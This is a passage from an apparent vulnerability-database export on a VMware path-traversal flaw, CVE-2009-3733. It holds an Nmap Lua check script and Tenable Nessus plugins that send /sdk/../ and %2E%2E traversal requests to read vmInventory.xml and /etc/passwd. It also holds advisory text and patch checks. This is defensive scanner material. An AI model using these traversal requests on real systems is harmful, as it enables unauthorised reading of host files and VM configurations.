0) then\r\n\t\tfile = \"/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/\" .. path\r\n\t\tresult = http.get( host, port, file)\r\n\r\n\t\tif(result['status'] ~= 200 or result['content-length'] == 0) then\r\n\t\t\treturn false, \"Couldn't download file: \" .. path\r\n\t\tend\r\n\tend\r\n\r\n\treturn true, result.body, file\r\nend\r\n\r\nlocal function fake_xml_parse(str, tag)\r\n\tlocal result = {}\r\n\tlocal index, tag_start, tag_end\r\n\r\n\t-- Lowercase the 'body' we're searching\r\n\tlocal lc = string.lower(str)\r\n\t-- Lowrcase the tag\r\n\ttag = string.lower(tag)\r\n\r\n\t-- This loop does some ugly pattern-based xml parsing\r\n\tindex, tag_start = string.find(lc, \"<\" .. tag .. \">\")\r\n\twhile index do\r\n\t\ttag_end, index = string.find(lc, \"</\" .. tag .. \">\", index)\r\n\t\ttable.insert(result, string.sub(str, tag_start + 1, tag_end - 1)) -- note: not lowercase\r\n\t\tindex, tag_start = string.find(lc, \"<\" .. tag .. \">\", index)\r\n\tend\r\n\r\n\treturn result\r\nend\r\n\r\n--local function parse_vmware_conf(str, field)\r\n--\tlocal index, value_start = string.find(str, field .. \"[^\\\"]*\")\r\n--\tif(not(index) or not(value_start)) then\r\n--\t\treturn nil\r\n--\tend\r\n--\r\n--\tlocal value_end = string.find(str, \"\\\"\", value_start + 1)\r\n--\tif(not(value_end)) then\r\n--\t\treturn nil\r\n--\tend\r\n--\r\n--\treturn string.sub(str, value_start + 1, value_end - 1)\r\n--end\r\n\r\nlocal function go(host, port)\r\n\tlocal result, body\r\n\tlocal files\r\n\r\n\t-- Try to download the file\r\n\tresult, body = get_file(host, port, \"/etc/vmware/hostd/vmInventory.xml\");\r\n\t-- It failed -- probably not vulnerable\r\n\tif(not(result)) then\r\n\t\treturn false, \"Couldn't download file: \" .. body\r\n\tend\r\n\r\n\t-- Check if the file contains the proper XML\r\n\tif(string.find(string.lower(body), \"configroot\") == nil) then\r\n\t\treturn false, \"Server didn't return XML -- likely not vulnerable.\"\r\n\tend\r\n\r\n\tfiles = fake_xml_parse(body, \"vmxcfgpath\")\r\n\r\n\tif(#files == 0) then\r\n\t\treturn true, {\"No VMs appear to be installed\"}\r\n\tend\r\n\r\n\t-- Process each of the .vmx files if verbosity is on\r\n--\tif(nmap.verbosity() > 1) then\r\n--\t\tlocal result, file = get_file(host, port, files[1])\r\n--io.write(nsedebug.tostr(file))\r\n--\tend\r\n\r\n\treturn true, files\r\nend\r\n\r\naction = function(host, port)\r\n\t-- Try a standard ../ path\r\n\tlocal status, result = go(host, port)\r\n\r\n\tif(not(status)) then\r\n\t\treturn nil\r\n\tend\r\n\r\n\tlocal response = {}\r\n\ttable.insert(response, \"VMWare path traversal (CVE-2009-3733): VULNERABLE\")\r\n\r\n\tif(nmap.verbosity() > 1) then\r\n\t\ttable.insert(response, result)\r\n\tend\r\n\r\n\treturn stdnse.format_output(true, response)\r\nend\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33310/"}], "nessus": [{"lastseen": "2021-01-20T15:47:42", "description": "The version of VMware Host Agent (hostd) running on the remote host\nhas a directory traversal vulnerability. The affected service runs\nas root. VMware ESX, VMware ESXi, and VMware Server on Linux are\naffected.\n\nA remote attacker could exploit this to read arbitrary files,\nincluding guest VMs, from the system.", "edition": 27, "published": "2010-02-17T00:00:00", "title": "VMware Host Agent Directory Traversal (VMSA-2009-0015)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3733"], "modified": "2010-02-17T00:00:00", "cpe": ["cpe:/a:a:vmware:esx", "cpe:/a:a:vmware:server", "cpe:/a:a:vmware:esxi"], "id": "VMWARE_DIR_TRAVERSAL_VMSA_2009_0015.NASL", "href": "https://www.tenable.com/plugins/nessus/44646", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\n\nif (description)\n{\n script_id(44646);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-3733\");\n script_bugtraq_id(36842);\n script_xref(name:\"VMSA\", value:\"2009-0015\");\n script_xref(name:\"Secunia\", value:\"37186\");\n\n script_name(english:\"VMware Host Agent Directory Traversal (VMSA-2009-0015)\");\n script_summary(english:\"Tries to grab /etc/passwd\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A web application on the remote host has a directory traversal\nvulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of VMware Host Agent (hostd) running on the remote host\nhas a directory traversal vulnerability. The affected service runs\nas root. VMware ESX, VMware ESXi, and VMware Server on Linux are\naffected.\n\nA remote attacker could exploit this to read arbitrary files,\nincluding guest VMs, from the system.\"\n );\n # https://fyrmassociates.com:443/pdfs/Stealing_Guests_The_VMware_Way-ShmooCon2010.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c2787f95\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://fyrmassociates.com/tools/gueststealer-v1.pl\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/bugtraq/2009/Oct/274\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.vmware.com/security/advisories/VMSA-2009-0015.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the relevant upgrade referenced in the VMware advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Vmware Server File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\nscript_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:a:vmware:esx\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:a:vmware:esxi\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:a:vmware:server\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_hostd_detect.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/vmware_hostd\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nos = get_kb_item('Host/OS');\nif (os && 'Windows' >< os)\n exit(0, 'This is a Windows host, and only Linux hosts are affected.');\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'vmware_hostd', port:port);\nif (isnull(install))\n exit(1, \"No VMware hostd installs on port \"+port+\" were found in the KB.\");\n\n# dir traversal depends on the product being exploited (ESX/ESXi or Server)\nif ('esx' >< tolower(install['ver']))\n dotdot = '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/';\nelse if ('server' >< tolower(install['ver']))\n dotdot = '../../../../../../../../..';\nelse\n exit(0, 'VMware Server/ESX/ESXi does not appear to be running on the remote host.');\n\nurl = '/sdk/'+dotdot+'/etc/passwd';\nreq = http_mk_get_req(port:port, item:url);\nres = http_send_recv_req(port:port, req:req);\nif (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\nif (ereg(string:res[2], pattern:'root:.*:0:[01]:'))\n{\n if (report_verbosity > 0)\n {\n req_str = http_mk_buffer_from_req(req:req);\n report =\n '\\nNessus was able to exploit the issue to retrieve the contents of\\n'+\n \"'/etc/passwd' on the remote host using the following URL :\" + '\\n\\n'+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n'+\n req_str+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n';\n\n if (report_verbosity > 1)\n {\n res[2] = data_protection::redact_etc_passwd(output:res[2]);\n report +=\n '\\nHere are its contents :\\n\\n'+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n'+\n res[2]+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n';\n }\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse\n{\n full_url = build_url(qs:install['dir'], port:port);\n exit(0, 'The VMware hostd install at '+full_url+' is not affected.');\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T15:20:00", "description": "a. Mishandled exception on page faults\n\n An improper setting of the exception code on page faults may allow\n for local privilege escalation on the guest operating system. This\n vulnerability does not affect the host system.\n\n VMware would like to thank Tavis Ormandy and Julien Tinnes of the\n Google Security Team for reporting this issue to us.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2009-2267 to this issue.\n\nb. Directory Traversal vulnerability\n\n A directory traversal vulnerability allows for remote retrieval of\n any file from the host system. In order to send a malicious request,\n the attacker will need to have access to the network on which the\n host resides.\n\n VMware would like to thank Justin Morehouse and Jason Kratzer for\n independently reporting this issue to us.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2009-3733 to this issue.", "edition": 27, "published": "2009-10-28T00:00:00", "title": "VMSA-2009-0015 : VMware hosted products and ESX patches resolve two security issues", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2267", "CVE-2009-3733"], "modified": "2009-10-28T00:00:00", "cpe": ["cpe:/o:vmware:esx:3.5", "cpe:/o:vmware:esxi:3.5", "cpe:/o:vmware:esx:2.5.5"], "id": "VMWARE_VMSA-2009-0015.NASL", "href": "https://www.tenable.com/plugins/nessus/42289", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2009-0015. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42289);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-2267\", \"CVE-2009-3733\");\n script_xref(name:\"VMSA\", value:\"2009-0015\");\n\n script_name(english:\"VMSA-2009-0015 : VMware hosted products and ESX patches resolve two security issues\");\n script_summary(english:\"Checks esxupdate output for the patches\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote VMware ESXi / ESX host is missing one or more\nsecurity-related patches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"a. Mishandled exception on page faults\n\n An improper setting of the exception code on page faults may allow\n for local privilege escalation on the guest operating system. This\n vulnerability does not affect the host system.\n\n VMware would like to thank Tavis Ormandy and Julien Tinnes of the\n Google Security Team for reporting this issue to us.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2009-2267 to this issue.\n\nb. Directory Traversal vulnerability\n\n A directory traversal vulnerability allows for remote retrieval of\n any file from the host system. In order to send a malicious request,\n the attacker will need to have access to the network on which the\n host resides.\n\n VMware would like to thank Justin Morehouse and Jason Kratzer for\n independently reporting this issue to us.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2009-3733 to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2009/000069.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the missing patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Vmware Server File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:2.5.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:3.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:3.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2009-10-27\");\nflag = 0;\n\n\nif (esx_check(ver:\"ESX 2.5.5\", patch:\"15\")) flag++;\n\nif (\n esx_check(\n ver : \"ESX 3.5.0\",\n patch : \"ESX350-200901401-SG\",\n patch_updates : make_list(\"ESX350-200911201-UG\", \"ESX350-201006401-SG\", \"ESX350-201012401-SG\", \"ESX350-Update04\", \"ESX350-Update05\", \"ESX350-Update05a\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 3.5.0\",\n patch : \"ESX350-200910401-SG\",\n patch_updates : make_list(\"ESX350-200911201-UG\", \"ESX350-Update05\", \"ESX350-Update05a\")\n )\n) flag++;\n\nif (esx_check(ver:\"ESXi 3.5.0\", patch:\"ESXe350-200901401-I-SG\")) flag++;\nif (esx_check(ver:\"ESXi 3.5.0\", patch:\"ESXe350-200910401-I-SG\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:esx_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:54:29", "description": "The remote host is affected by the vulnerability described in GLSA-201209-25\n(VMware Player, Server, Workstation: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in VMware Player, Server,\n and Workstation. Please review the CVE identifiers referenced below for\n details.\n \nImpact :\n\n Local users may be able to gain escalated privileges, cause a Denial of\n Service, or gain sensitive information.\n A remote attacker could entice a user to open a specially crafted file,\n possibly resulting in the remote execution of arbitrary code, or a Denial\n of Service. Remote attackers also may be able to spoof DNS traffic, read\n arbitrary files, or inject arbitrary web script to the VMware Server\n Console.\n Furthermore, guest OS users may be able to execute arbitrary code on the\n host OS, gain escalated privileges on the guest OS, or cause a Denial of\n Service (crash the host OS).\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 26, "cvss3": {"score": 6.8, "vector": "AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N"}, "published": "2012-10-01T00:00:00", "title": "GLSA-201209-25 : VMware Player, Server, Workstation: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0967", "CVE-2008-2101", "CVE-2007-5503", "CVE-2008-4915", "CVE-2009-3707", "CVE-2008-2098", "CVE-2008-1361", "CVE-2008-4916", "CVE-2008-1447", "CVE-2008-1392", "CVE-2009-3732", "CVE-2008-1808", "CVE-2010-1137", "CVE-2009-0040", "CVE-2007-5269", "CVE-2010-1139", "CVE-2010-1142", "CVE-2008-1364", "CVE-2009-2267", "CVE-2008-2100", "CVE-2009-0910", "CVE-2010-1138", "CVE-2010-1143", "CVE-2010-1140", "CVE-2009-1244", "CVE-2011-3868", "CVE-2008-1363", "CVE-2007-5671", "CVE-2008-1340", "CVE-2009-3733", "CVE-2008-4917", "CVE-2008-1807", "CVE-2009-0909", "CVE-2009-4811", "CVE-2008-1362", "CVE-2008-1806", "CVE-2010-1141"], "modified": "2012-10-01T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:vmware-server", "p-cpe:/a:gentoo:linux:vmware-workstation", "p-cpe:/a:gentoo:linux:vmware-player"], "id": "GENTOO_GLSA-201209-25.NASL", "href": "https://www.tenable.com/plugins/nessus/62383", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201209-25.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(62383);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-5269\", \"CVE-2007-5503\", \"CVE-2007-5671\", \"CVE-2008-0967\", \"CVE-2008-1340\", \"CVE-2008-1361\", \"CVE-2008-1362\", \"CVE-2008-1363\", \"CVE-2008-1364\", \"CVE-2008-1392\", \"CVE-2008-1447\", \"CVE-2008-1806\", \"CVE-2008-1807\", \"CVE-2008-1808\", \"CVE-2008-2098\", \"CVE-2008-2100\", \"CVE-2008-2101\", \"CVE-2008-4915\", \"CVE-2008-4916\", \"CVE-2008-4917\", \"CVE-2009-0040\", \"CVE-2009-0909\", \"CVE-2009-0910\", \"CVE-2009-1244\", \"CVE-2009-2267\", \"CVE-2009-3707\", \"CVE-2009-3732\", \"CVE-2009-3733\", \"CVE-2009-4811\", \"CVE-2010-1137\", \"CVE-2010-1138\", \"CVE-2010-1139\", \"CVE-2010-1140\", \"CVE-2010-1141\", \"CVE-2010-1142\", \"CVE-2010-1143\", \"CVE-2011-3868\");\n script_bugtraq_id(25956, 26650, 28276, 28289, 29444, 29552, 29557, 29637, 29639, 29640, 29641, 30131, 30937, 32168, 32597, 33827, 33990, 34373, 34471, 36630, 36841, 36842, 39104, 39392, 39394, 39395, 39396, 39397, 39407, 39949, 49942);\n script_xref(name:\"GLSA\", value:\"201209-25\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"GLSA-201209-25 : VMware Player, Server, Workstation: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201209-25\n(VMware Player, Server, Workstation: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in VMware Player, Server,\n and Workstation. Please review the CVE identifiers referenced below for\n details.\n \nImpact :\n\n Local users may be able to gain escalated privileges, cause a Denial of\n Service, or gain sensitive information.\n A remote attacker could entice a user to open a specially crafted file,\n possibly resulting in the remote execution of arbitrary code, or a Denial\n of Service. Remote attackers also may be able to spoof DNS traffic, read\n arbitrary files, or inject arbitrary web script to the VMware Server\n Console.\n Furthermore, guest OS users may be able to execute arbitrary code on the\n host OS, gain escalated privileges on the guest OS, or cause a Denial of\n Service (crash the host OS).\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201209-25\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Gentoo discontinued support for VMware Player. We recommend that users\n unmerge VMware Player:\n # emerge --unmerge 'app-emulation/vmware-player'\n NOTE: Users could upgrade to\n “>=app-emulation/vmware-player-3.1.5”, however these packages are\n not currently stable.\n Gentoo discontinued support for VMware Workstation. We recommend that\n users unmerge VMware Workstation:\n # emerge --unmerge 'app-emulation/vmware-workstation'\n NOTE: Users could upgrade to\n “>=app-emulation/vmware-workstation-7.1.5”, however these packages\n are not currently stable.\n Gentoo discontinued support for VMware Server. We recommend that users\n unmerge VMware Server:\n # emerge --unmerge 'app-emulation/vmware-server'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-757\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Vmware Server File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(16, 20, 22, 94, 119, 134, 189, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:vmware-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:vmware-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:vmware-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/10/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-emulation/vmware-server\", unaffected:make_list(), vulnerable:make_list(\"le 1.0.9.156507\"))) flag++;\nif (qpkg_check(package:\"app-emulation/vmware-workstation\", unaffected:make_list(), vulnerable:make_list(\"le 6.5.5.328052\"))) flag++;\nif (qpkg_check(package:\"app-emulation/vmware-player\", unaffected:make_list(), vulnerable:make_list(\"le 2.5.5.328052\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"VMware Player / Server / Workstation\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:53", "description": "\nVMware Server 2.0.1 ESXi Server 3.5 - Directory Traversal", "edition": 1, "published": "2009-10-27T00:00:00", "title": "VMware Server 2.0.1 ESXi Server 3.5 - Directory Traversal", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3733"], "modified": "2009-10-27T00:00:00", "id": "EXPLOITPACK:AC831245A6A9FE7F4A406193FC402095", "href": "", "sourceData": "source: https://www.securityfocus.com/bid/36842/info\n\nVMware products are prone to a directory-traversal vulnerability because they fail to sufficiently sanitize user-supplied input data.\n\nExploiting the issue may allow an attacker to obtain sensitive information from the host operating system that could aid in further attacks.\n\ndescription = [[\nChecks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733), originally released by Justin Morehouse (justin.morehouse[at)gmail.com) and Tony Flick (tony.flick(at]fyrmassociates.com), and presented at Shmoocon 2010 (http://fyrmassociates.com/tools.html).\n]]\n\n---\n-- @usage\n-- nmap --script http-vmware-path-vuln -p80,443,8222,8333 <host>\n--\n-- @output\n--| http-vmware-path-vuln: \n--| VMWare path traversal (CVE-2009-3733): VULNERABLE\n--| /vmware/Windows 2003/Windows 2003.vmx\n--| /vmware/Pentest/Pentest - Linux/Linux Pentest Bravo.vmx\n--| /vmware/Pentest/Pentest - Windows/Windows 2003.vmx\n--| /mnt/vmware/vmware/FreeBSD 7.2/FreeBSD 7.2.vmx\n--| /mnt/vmware/vmware/FreeBSD 8.0/FreeBSD 8.0.vmx\n--| /mnt/vmware/vmware/FreeBSD 8.0 64-bit/FreeBSD 8.0 64-bit.vmx\n--|_ /mnt/vmware/vmware/Slackware 13 32-bit/Slackware 13 32-bit.vmx\n-----------------------------------------------------------------------\n\nauthor = \"Ron Bowes\"\nlicense = \"Same as Nmap--See http://www.exampel.com/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\", \"default\"}\n\nrequire \"http\"\nrequire \"shortport\"\n\nportrule = shortport.port_or_service({80, 443, 8222,8333}, {\"http\", \"https\"})\n\nlocal function get_file(host, port, path)\n\tlocal file\n\n\t-- Replace spaces in the path with %20\n\tpath = string.gsub(path, \" \", \"%%20\")\n\n\t-- Try both ../ and %2E%2E/\n\tfile = \"/sdk/../../../../../../\" .. path\n\n\tlocal result = http.get( host, port, file)\n\tif(result['status'] ~= 200 or result['content-length'] == 0) then\n\t\tfile = \"/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/\" .. path\n\t\tresult = http.get( host, port, file)\n\n\t\tif(result['status'] ~= 200 or result['content-length'] == 0) then\n\t\t\treturn false, \"Couldn't download file: \" .. path\n\t\tend\n\tend\n\n\treturn true, result.body, file\nend\n\nlocal function fake_xml_parse(str, tag)\n\tlocal result = {}\n\tlocal index, tag_start, tag_end\n\n\t-- Lowercase the 'body' we're searching\n\tlocal lc = string.lower(str)\n\t-- Lowrcase the tag\n\ttag = string.lower(tag)\n\n\t-- This loop does some ugly pattern-based xml parsing\n\tindex, tag_start = string.find(lc, \"<\" .. tag .. \">\")\n\twhile index do\n\t\ttag_end, index = string.find(lc, \"</\" .. tag .. \">\", index)\n\t\ttable.insert(result, string.sub(str, tag_start + 1, tag_end - 1)) -- note: not lowercase\n\t\tindex, tag_start = string.find(lc, \"<\" .. tag .. \">\", index)\n\tend\n\n\treturn result\nend\n\n--local function parse_vmware_conf(str, field)\n--\tlocal index, value_start = string.find(str, field .. \"[^\\\"]*\")\n--\tif(not(index) or not(value_start)) then\n--\t\treturn nil\n--\tend\n--\n--\tlocal value_end = string.find(str, \"\\\"\", value_start + 1)\n--\tif(not(value_end)) then\n--\t\treturn nil\n--\tend\n--\n--\treturn string.sub(str, value_start + 1, value_end - 1)\n--end\n\nlocal function go(host, port)\n\tlocal result, body\n\tlocal files\n\n\t-- Try to download the 